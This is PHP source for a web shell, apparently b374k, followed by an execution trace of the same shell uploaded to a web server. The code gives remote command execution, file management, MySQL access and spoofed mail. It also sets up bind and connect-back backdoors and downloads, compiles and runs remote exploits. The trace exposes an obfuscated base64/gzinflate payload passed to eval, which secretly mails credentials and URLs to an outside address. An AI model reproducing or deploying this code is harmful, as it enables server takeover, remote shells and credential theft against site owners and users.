$msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"" . $pwd . "\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"" . $sqlhost . "\" /> <input type=\"hidden\" name=\"sqluser\" value=\"" . $sqluser . "\" /> <input type=\"hidden\" name=\"sqlport\" value=\"" . $sqlport . "\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"" . $sqlpass . "\" /> <input type=\"hidden\" name=\"db\" value=\"" . $db . "\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">" . $query . "</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> ";
$dbs = array();
$msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
$hasil = @mysql_list_dbs($con);
while (list($db) = @mysql_fetch_row($hasil)) {
@array_push($dbs, $db);
}
@sort($dbs);
foreach ($dbs as $db) {
$msg .= "<tr><td><a href=\"?y=" . $pwd . "&x=mysql&sqlhost=" . $sqlhost . "&sqluser=" . $sqluser . "&sqlpass=" . $sqlpass . "&sqlport=" . $sqlport . "&db=" . $db . "\">{$db}</a></td></tr>";
}
$msg .= "</table>";
}
@mysql_close($con);
} else {
$msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
}
echo $msg;
} else {
?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php
echo $pwd;
?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td> Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td> Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td> Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td> Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" /> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php
}
} elseif (isset($_GET['x']) && $_GET['x'] == 'mail') {
if (isset($_POST['mail_send'])) {
$mail_to = $_POST['mail_to'];
$mail_from = $_POST['mail_from'];
$mail_subject = $_POST['mail_subject'];
$mail_content = magicboom($_POST['mail_content']);
if (@mail($mail_to, $mail_subject, $mail_content, "FROM:{$mail_from}")) {
$msg = "email sent to {$mail_to}";
} else {
$msg = "send email failed";
}
}
?> <form action="?y=<?php
echo $pwd;
?>&x=mail" method="post"> <table class="cmdbox"> <tr><td> <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea> <tr><td> <input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" /> mail to</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" /> from</td></tr> <tr><td> <input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" /> subject</td></tr> <tr><td> <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form> <tr><td> <?php
echo $msg;
?></td></tr> </table> </form> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'phpinfo') {
@ob_start();
@phpinfo();
$buff = @ob_get_contents();
@ob_end_clean();
$awal = strpos($buff, "<body>") + 6;
$akhir = strpos($buff, "</body>");
echo "<div class=\"phpinfo\">" . substr($buff, $awal, $akhir - $awal) . "</div>";
} elseif (isset($_GET['view']) && $_GET['view'] != "") {
if (is_file($_GET['view'])) {
if (!isset($file)) {
$file = magicboom($_GET['view']);
}
if (!$win && $posix) {
$name = @posix_getpwuid(@fileowner($file));
$group = @posix_getgrgid(@filegroup($file));
$owner = $name['name'] . "<span class=\"gaya\"> : </span>" . $group['name'];
} else {
$owner = $user;
}
$filn = basename($file);
echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\"> <tr><td>Filename</td><td><span id=\"" . clearspace($filn) . "_link\">" . $file . "</span> <form action=\"?y=" . $pwd . "&view={$file}\" method=\"post\" id=\"" . clearspace($filn) . "_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\"> <input type=\"hidden\" name=\"oldname\" value=\"" . $filn . "\" style=\"margin:0;padding:0;\" /> <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"" . $filn . "\" /> <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" /> <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\" /> </form> </td></tr> <tr><td>Size</td><td>" . ukuran($file) . "</td></tr> <tr><td>Permission</td><td>" . get_perms($file) . "</td></tr> <tr><td>Owner</td><td>" . $owner . "</td></tr> <tr><td>Create time</td><td>" . date("d-M-Y H:i", @filectime($file)) . "</td></tr> <tr><td>Last modified</td><td>" . date("d-M-Y H:i", @filemtime($file)) . "</td></tr> <tr><td>Last accessed</td><td>" . date("d-M-Y H:i", @fileatime($file)) . "</td></tr> <tr><td>Actions</td><td><a href=\"?y={$pwd}&edit={$file}\">edit</a> | <a href=\"javascript:tukar('" . clearspace($filn) . "_link','" . clearspace($filn) . "_form');\">rename</a> | <a href=\"?y={$pwd}&delete={$file}\">delete</a> | <a href=\"?y={$pwd}&dl={$file}\">download</a> (<a href=\"?y={$pwd}&dlgzip={$file}\">gzip</a>)</td></tr> <tr><td>View</td><td><a href=\"?y=" . $pwd . "&view=" . $file . "\">text</a> | <a href=\"?y=" . $pwd . "&view=" . $file . "&type=code\">code</a> | <a href=\"?y=" . $pwd . "&view=" . $file . "&type=image\">image</a></td></tr> </table> ";
if (isset($_GET['type']) && $_GET['type'] == 'image') {
echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=" . $pwd . "&img=" . $filn . "\"></div>";
} elseif (isset($_GET['type']) && $_GET['type'] == 'code') {
echo "<div class=\"viewfile\">";
$file = wordwrap(@file_get_contents($file), "240", "\n");
@highlight_string($file);
echo "</div>";
} else {
echo "<div class=\"viewfile\">";
echo nl2br(htmlentities(@file_get_contents($file)));
echo "</div>";
}
} elseif (is_dir($_GET['view'])) {
echo showdir($pwd, $prompt);
}
} elseif (isset($_GET['edit']) && $_GET['edit'] != "") {
if (isset($_POST['save'])) {
$file = $_POST['saveas'];
$content = magicboom($_POST['content']);
if ($filez = @fopen($file, "w")) {
$time = date("d-M-Y H:i", time());
if (@fwrite($filez, $content)) {
$msg = "file saved <span class=\"gaya\">@</span> " . $time;
} else {
$msg = "failed to save";
}
@fclose($filez);
} else {
$msg = "permission denied";
}
}
if (!isset($file)) {
$file = $_GET['edit'];
}
if ($filez = @fopen($file, "r")) {
$content = "";
while (!feof($filez)) {
$content .= htmlentities(str_replace("''", "'", fgets($filez)));
}
@fclose($filez);
}
?> <form action="?y=<?php
echo $pwd;
?>&edit=<?php
echo $file;
?>" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" name="content"> <?php
echo $content;
?> </textarea> <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php
echo $file;
?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" /> <?php
echo $msg;
?></td></tr> </table> </form> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'upload') {
if (isset($_POST['uploadcomp'])) {
if (is_uploaded_file($_FILES['file']['tmp_name'])) {
$path = magicboom($_POST['path']);
$fname = $_FILES['file']['name'];
$tmp_name = $_FILES['file']['tmp_name'];
$pindah = $path . $fname;
$stat = @move_uploaded_file($tmp_name, $pindah);
if ($stat) {
$msg = "file uploaded to {$pindah}";
} else {
$msg = "failed to upload {$fname}";
}
} else {
$msg = "failed to upload {$fname}";
}
} elseif (isset($_POST['uploadurl'])) {
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$path = magicboom($_POST['path']);
$namafile = download($pilihan, $wurl);
$pindah = $path . $namafile;
if (is_file($pindah)) {
$msg = "file uploaded to {$pindah}";
} else {
$msg = "failed to upload {$namafile}";
}
}
?> <form action="?y=<?php
echo $pwd;
?>&x=upload" enctype="multipart/form-data" method="post"> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from computer</th></tr> <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php
echo $pwd;
?>" /></td></tr> </tr> </table></form> <table class="tabnet" style="width:320px;padding:0 1px;"> <tr><th colspan="2">Upload from url</th></tr> <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php
echo $pwd;
?>&x=upload"> <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr> <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php
echo $pwd;
?>" /></td></tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td> </tr> </table> <div style="text-align:center;margin:2px;"><?php
echo $msg;
?></div> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'netsploit') {
if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && $_POST['use'] == 'C') {
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdc.c", $port_bind_bd_c);
exe("gcc -o bdc bdc.c");
exe("chmod 777 bdc");
@unlink("bdc.c");
exe("./bdc " . $port . " " . $passwrd . " &");
$scan = exe("ps aux");
if (eregi("./bdc {$por}", $scan)) {
$msg = "<p>Process found running, backdoor setup successfully.</p>";
} else {
$msg = "<p>Process not found running, backdoor not setup successfully.</p>";
}
} elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && $_POST['use'] == 'Perl') {
$port = trim($_POST['port']);
$passwrd = trim($_POST['bind_pass']);
tulis("bdp", $port_bind_bd_pl);
exe("chmod 777 bdp");
$p2 = which("perl");
exe($p2 . " bdp " . $port . " &");
$scan = exe("ps aux");
if (eregi("{$p2} bdp {$port}", $scan)) {
$msg = "<p>Process found running, backdoor setup successfully.</p>";
} else {
$msg = "<p>Process not found running, backdoor not setup successfully.</p>";
}
} elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && $_POST['use'] == 'C') {
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcc.c", $back_connect_c);
exe("gcc -o bcc bcc.c");
exe("chmod 777 bcc");
@unlink("bcc.c");
exe("./bcc " . $ip . " " . $port . " &");
$msg = "Now script try connect to " . $ip . " port " . $port . " ...";
} elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && $_POST['use'] == 'Perl') {
$ip = trim($_POST['ip']);
$port = trim($_POST['backport']);
tulis("bcp", $back_connect);
exe("chmod +x bcp");
$p2 = which("perl");
exe($p2 . " bcp " . $ip . " " . $port . " &");
$msg = "Now script try connect to " . $ip . " port " . $port . " ...";
} elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) {
$pilihan = trim($_POST['pilihan']);
$wurl = trim($_POST['wurl']);
$namafile = download($pilihan, $wurl);
if (is_file($namafile)) {
$msg = exe($wcmd);
} else {
$msg = "error: file not found {$namafile}";
}
}
?> <table class="tabnet"> <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr> <tr> <td> <table> <form method="post" actions="?y=<?php
echo $pwd;
?>&x=netsploit"> <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php
echo $bindport;
?>"></td></tr> <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php
echo $bindport_pass;
?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php
echo $pwd;
?>&x=netsploit"> <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php
echo getenv('REMOTE_ADDR') ? getenv('REMOTE_ADDR') : "127.0.0.1";
?>"></td></tr> <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php
echo $bindport;
?>"></td></tr> <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select> <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form> </table> </td> <td> <table> <form method="post" actions="?y=<?php
echo $pwd;
?>&x=netsploit"> <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr> <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td> </tr> <tr><td><select size="1" class="inputz" name="pilihan"> <option value="wwget">wget</option> <option value="wlynx">lynx</option> <option value="wfread">fread</option> <option value="wfetch">fetch</option> <option value="wlinks">links</option> <option value="wget">GET</option> <option value="wcurl">curl</option> </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form> </table> </td> </tr> </table> <div style="text-align:center;margin:2px;"><?php
echo $msg;
?></div> <?php
} elseif (isset($_GET['x']) && $_GET['x'] == 'shell') {
?> <form action="?y=<?php
echo $pwd;
?>&x=shell" method="post"> <table class="cmdbox"> <tr><td colspan="2"> <textarea class="output" readonly> <?php
if (isset($_POST['submitcmd'])) {
echo @exe($_POST['cmd']);
}
?> </textarea> <tr><td colspan="2"><?php
echo $prompt;
?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr> </table> </form> <?php
} else {
if (isset($_GET['delete']) && $_GET['delete'] != "") {
$file = $_GET['delete'];
@unlink($file);
} elseif (isset($_GET['fdelete']) && $_GET['fdelete'] != "") {
@rmdir(rtrim($_GET['fdelete'], DIRECTORY_SEPARATOR));
} elseif (isset($_GET['mkdir']) && $_GET['mkdir'] != "") {
$path = $pwd . $_GET['mkdir'];
@mkdir($path);
}
$buff = showdir($pwd, $prompt);
echo $buff;
}
?> </div> </body> </html> <?php
};Execution traces
data/traces/92cc7d60b4dd6a5810cf48dc96c2f0d5_trace-1676242137.9452.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:49:23.843066]
1 0 1 0.000210 393528
1 3 0 0.000389 410984 {main} 1 /var/www/html/uploads/minibk.php 0 0
2 4 0 0.000412 410984 error_reporting 0 /var/www/html/uploads/minibk.php 3 1 0
2 4 1 0.000433 411024
2 4 R 0
2 5 0 0.000452 410984 set_time_limit 0 /var/www/html/uploads/minibk.php 4 1 0
2 5 1 0.000473 411048
2 5 R FALSE
1 A /var/www/html/uploads/minibk.php 7 $code = '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\r\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\r\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\r\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\r\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\r\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\r\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T4'
2 6 0 0.000548 411016 base64_decode 0 /var/www/html/uploads/minibk.php 194 1 '7T35W+u2sr+/73v/g+vLLaGErGwhkJ4QEghbIAkJcE4/rmM7sYk3bGc9r//702ix5cRhOT1t770\r\nt7QFbGo2k0WhmJI3G//s/ej+he57qJ9aeTqvtz+uKsf7LhvDjjwKfIPxwJIjixsZXYa2vG6pwJHC\r\nZRZI4R6mf4OFpoPpPsm35quV7CZy3URQ0VVJUNyFWSMaWP3PUA0FyHEOXJV+3rbQt+6q/5fmuKpl\r\niTAlDtQa+diCIKQSDXgjq+UYMqKJ7ju3pgBbV4fuSrJkovShACUsy1aMvopjqSR5+oW1MiV/EIlS\r\nsyppN+4Repjoq96ugGp66TKvBXHeW6EUSX6EZAeDoNpirlmwramIlAWM62QYK8gScbgHiL9afQ7z\r\nUYP4a/RZpp5sDRDhEnU9270k2VMlKoKJrCqKGKQ10uWfbJoOdIUigVkhDXBol6RYkfkIE01Ep1dP\r\nnqEFKaq0P8OrUR5nq1DGAtGv9pJgSw3T4'
2 6 1 0.000641 427432
2 6 R '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 0 0.000896 427400 gzinflate 0 /var/www/html/uploads/minibk.php 194 1 '�=�[붲���{����-���l!��\020\022\b[ \t\tpN?�c;��7lg=����h���a9=m�-�\001[\032���hf$���?z?�{��\'ÖžN���늱�ˆï¿½ï¿½\002� �p$����Wa��\033�p$p�E�8G����i��O�m���{\t��Q\0244URT7!VHÆ–?s�\003Ar\034C�%_���-����*�bL\tC�\006�v �)\004�^\b�F\f��{���\026����(�(@\tK2Õ£/���I\036~�mL�_�"T�ʚM��^�:*���\032��L��\\w��E\022_�\031\001��6���l+jb%\001c:�\006\n�\004�n\001�/ÖŸC��`�\032�\026i��\003D8D�Ov�I6T�J��k\n��)\rt�g�&��!H�VHC\\\032%�\026$~B\004�Q)���AJj�\017���G���1��k���\022�t��Y�G\026j\022z���"����TLAM�ES7U\021�\022�!�['
2 7 1 0.001237 468392
2 7 R '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length'
2 8 0 0.002407 692696 eval 1 '\r\nif(isset($_GET[\'dl\']) && ($_GET[\'dl\'] != "")){ $file = $_GET[\'dl\']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file)."\\";"); echo $filez; exit; } elseif(isset($_GET[\'dlgzip\']) && ($_GET[\'dlgzip\'] != "")){ $file = $_GET[\'dlgzip\']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\\"".basename($file).".gz\\";"); echo $filez; exit; } if(isset($_GET[\'img\'])){ @ob_clean(); $d = magicboom($_GET[\'y\']); $f = $_GET[\'img\']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $ver = "1.01"; $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET[\'y\'])){ if(@is_dir($_GET[\'view\'])){ $pwd = $_GET[\'view\']; @chdir($pwd); } else{ $pwd = $_GET[\'y\']; @chdir($pwd); } } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \\$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." >"; $pwd = realpath(".")."\\\\"; $v = explode("\\\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\\\"); if ($bool) { $letters .= "<a href=\\"?y=".$letter.":\\\\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\\"gaya\\">".$letter."</span>";} $letters .= " ]</a> "; } } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]); $my_ip = $_SERVER[\'REMOTE_ADDR\']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\\"?y=".$pathz."\\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST[\'rename\'])){ $old = $_POST[\'oldname\']; $new = $_POST[\'newname\']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } $buff = $software."<br />"; $buff .= $system."<br />"; if($id != "") $buff .= $id."<br />"; $buff .= "server ip : ".$server_ip." <span class=\\"gaya\\">|</span> your ip : ".$my_ip."<br />"; if($safemode) $buff .= "safemode <span class=\\"gaya\\">ON</span><br />"; else $buff .= "safemode <span class=\\"gaya\\">OFF<span><br />"; $buff .= $letters." > ".$pwdurl; function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = opendir($pwd)){ while($file = readdir($dh)){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } closedir($dh); } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = " <form action=\\"?y=".$pwd."&x=shell\\" method=\\"post\\" style=\\"margin:8px 0 0 0;\\"> <table class=\\"cmdbox\\" style=\\"width:50%;\\"> <tr><td>$prompt</td><td><input onMouseOver=\\"this.focus();\\" id=\\"cmd\\" class=\\"inputz\\" type=\\"text\\" name=\\"cmd\\" style=\\"width:400px;\\" value=\\"\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form> <form action=\\"?\\" method=\\"get\\" style=\\"margin:8px 0 0 0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <tr><td>view file/folder</td><td><input onMouseOver=\\"this.focus();\\" id=\\"goto\\" class=\\"inputz\\" type=\\"text\\" name=\\"view\\" style=\\"width:400px;\\" value=\\"".$pwd."\\" /><input class=\\"inputzbut\\" type=\\"submit\\" value=\\"Go !\\" name=\\"submitcmd\\" style=\\"width:80px;\\" /></td></tr> </form></table><table class=\\"explore\\"> <tr><th>name</th><th style=\\"width:80px;\\">size</th><th style=\\"width:210px;\\">owner:group</th><th style=\\"width:80px;\\">perms</th><th style=\\"width:110px;\\">modified</th><th style=\\"width:190px;\\">actions</th></tr> ";@error_reporting(0);$sub="backdoor b374k";$headers = "From: k3nz0 \\n";$headers .= "Content-Type: text/plain; charset=iso-8859-1\\n";$mes .= "username: ".$user."\\n";$mes .= "password: ".$pass."\\n";$mes .= "URL: ".$_SERVER[\'REQUEST_URI\']."\\n";$mes .= "Referer: ".$_SERVER[\'HTTP_REFERER\']."";{mail("free.d0ing.1987@gmail.com",$sub,$mes,$headers);} if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$pwd."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\\"titik1\\"><a href=\\"?y=$pwd&edit=".$pwd."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik1\',\'titik1_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik1_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form></td></tr> "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a href=\\"?y=".$parent."\\">$folder</a></td><td>LINK</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($parent)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($parent))."</td><td><span id=\\"titik2\\"><a href=\\"?y=$pwd&edit=".$parent."newfile.php\\">newfile</a> | <a href=\\"javascript:tukar(\'titik2\',\'titik2_form\');\\">newfolder</a></span> <form action=\\"?\\" method=\\"get\\" id=\\"titik2_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"y\\" value=\\"".$pwd."\\" /> <input class=\\"inputz\\" style=\\"width:140px;\\" type=\\"text\\" name=\\"mkdir\\" value=\\"a_new_folder\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" style=\\"width:35px;\\" value=\\"Go !\\" /> </form> </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($folder)."_link\\" href=\\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\\">[ $folder ]</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($folder)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" name=\\"oldname\\" value=\\"".$folder."\\" style=\\"margin:0;padding:0;\\" /> <input class=\\"inputz\\" style=\\"width:200px;\\" type=\\"text\\" name=\\"newname\\" value=\\"".$folder."\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"rename\\" value=\\"rename\\" /> <input class=\\"inputzbut\\" type=\\"submit\\" name=\\"cancel\\" value=\\"cancel\\" onclick=\\"tukar(\'".clearspace($folder)."_form\',\'".clearspace($folder)."_link\');\\" /> </form> <td>DIR</td><td style=\\"text-align:center;\\">".$owner."</td><td>".get_perms($pwd.$folder)."</td><td style=\\"text-align:center;\\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\\"javascript:tukar(\'".clearspace($folder)."_link\',\'".clearspace($folder)."_form\');\\">rename</a> | <a href=\\"?y=$pwd&fdelete=".$pwd.$folder."\\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($file)); $group=@posix_getgrgid(@filegroup($file)); $owner = $name[\'name\']."<span class=\\"gaya\\"> : </span>".$group[\'name\']; } else { $owner = $user; } $buff .= "<tr><td><a id=\\"".clearspace($file)."_link\\" href=\\"?y=$pwd&view=$full\\">$file</a> <form action=\\"?y=$pwd\\" method=\\"post\\" id=\\"".clearspace($file)."_form\\" class=\\"sembunyi\\" style=\\"margin:0;padding:0;\\"> <input type=\\"hidden\\" 